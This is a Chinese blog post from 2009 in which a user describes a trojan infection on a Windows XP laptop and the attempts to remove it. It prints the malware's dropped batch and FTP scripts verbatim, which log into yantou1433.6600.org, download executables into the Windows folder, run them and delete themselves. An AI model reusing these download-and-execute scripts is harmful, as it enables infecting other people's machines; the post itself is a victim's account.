zoukankan      html  css  js  c++  java

  • 中木马了,yantou1433.6600.org

    update 20090409

    同意可能是SQL Server造成的问题,我之前安装的是SQL Server 2005 + SP1,系统的用户名和密码没有改。

    update 20090326

    从留言来看似乎有同样情况的兄弟不少,不知道你们怎么处理,我这边用土办法坚持了一段时间,最终还是重装了系统。

    ----------------------

    家里的笔记本电脑在一周之前,曾经有一次莫名其妙的故障:Visual Studio 2008 Command Prompt(命令行方式)的图标突然发生了变化,然后就无法启动了。检查之后,发现Windows系统自带的cmd.exe无法启动,报错信息为“……Windows 无法访问指定设备、路径和文件……”,并且System32目录下的cmd.exe无法删除,即使使用安全模式启动也同样。

    在google上搜索了一下,主要的解决方案有三种:1. 系统路径设置;2. 修改注册表;3. 工具软件。因为从搜索引擎中还是可以很方便的找到,所以我就不再详细描述了,但是这三个办法都没有什么实际的效果。

    最后的解决,是使用了Windows XP的系统安装盘,进行了系统恢复,就是在出现选择修复还是安装的时候选“R”,然后进入命令行方式,在这种方式下可以对cmd.exe进行复制的操作,我复制了一个,命名为 cmdd.exe,然后重新启动机器。

    很神奇的是,重启之后 cmd.exe 可以被删除了,而复制得到的那个 cmdd.exe 也可以正常的使用,于是我又把它重命名为 cmd.exe,这之后 Visual Studio 2008 Command Prompt 也恢复了正常。

    原以为这样就可以告一段落,结果证明,这只是刚刚开始。

    电脑上安装的杀毒软件和防火墙都是KV2008,并且升级到了最新的定义。

    后来发现 Windows 的任务管理器里面出现了多余的 cmd.exe 进程,通常是两个;在 System32 目录下出现了setuplp.sys, yantou.sys, setupis.bat, yantou.bat等类似的文件,一般bat文件和sys文件成对出现。文件的内容如下:

    ---------------------------------------

    setupis.bat文件中:

    ftp -s:yantou.sys
    start C:\WINDOWS\\tcpsvr1.exe
    start C:\WINDOWS\\tcpsvr2.exe
    start C:\WINDOWS\\tcpsvr3.exe
    del yantou.sys
    del %0
    -----------------------------------------
    setuplp.sys文件中:

    ftp -s:setuplp.sys
    start C:\setuplp.exe
    del setuplp.sys
    del %0

    -----------------------------------------

    yantou.bat文件中:

    open yantou1433.6600.org
    yantou
    2009
    get 1.exe C:\WINDOWS\\tcpsvr1.exe
    get 2.exe C:\WINDOWS\\tcpsvr2.exe
    get 3.exe C:\WINDOWS\\tcpsvr3.exe
    bye

    -----------------------------------------

    大意是说从木马作者的ftp上下载这几个木马文件,然后执行。

    在google上面搜索了一下“yantou1433.6600.org”,发现有人遇到了同样的问题

    现在我得机器上,tcpsrv1.exe类似的程序应该已经被KV2008识别,自动清除不再出现(?);而 System32 目录下的几个异常文件还是会出现,并且似乎有一个 vfocgm.key 的文件,在记录我的计算机操作。另外似乎在木马运行的时候,KV2008会发出声音警告,这是侯如果察看任务管理器,应该可以看到多余的 cmd.exe 进程。

    现在采用了一个之前在优盘上预防病毒的方式,我保留了那几个异常的文件,把其中的内容删除,并且将文件改为只读,不知道是否有效。我还把 System32 目录下的 cmd.exe 文件修改为指定的用户读取和执行,而不是之前的 everyone,这个操作可能会造成一些软件运行的不正常,有待观察。

    在我的机器上出现了两组异常的文件,其中涉及的两个ftp地址分别为:yantou1433.6600.org, tianlong8.3322.org

    我在网络上查询了一下“yantou1433.6600.org”,ip地址为:61.191.57.35,位于:安徽省合肥市电信IDC机房,注册人为:江苏常州;tianlong8.3322.org”,ip地址为:61.191.57.35,位于:江苏省扬州市电信,注册人:江苏常州。这两个地址属于一家提供主页空间提供商,所以无法判断就是是谁在木马的后面。暂时只能禁用这两个ip地址。

    同时提供一篇课外阅读材料,为什么受伤总是我

    我觉得电脑是中了木马,虽然我已经尽力防守,可是并不能肯定是否能够阻止,不知道谁能帮助我?
  • 相关阅读:
    2.4 学习总计 之 自己实现底部导航
    2.3 学习总结 之 分页查询
    2.2 学习总结 之 servlet 的两次抽取
    Rocket
    Rocket
    Rocket
    Rocket
    Rocket
    Rocket
    Rocket
  • 原文地址:https://www.cnblogs.com/zhaorui/p/20090301_yantou.html
Copyright © 2011-2022 走看看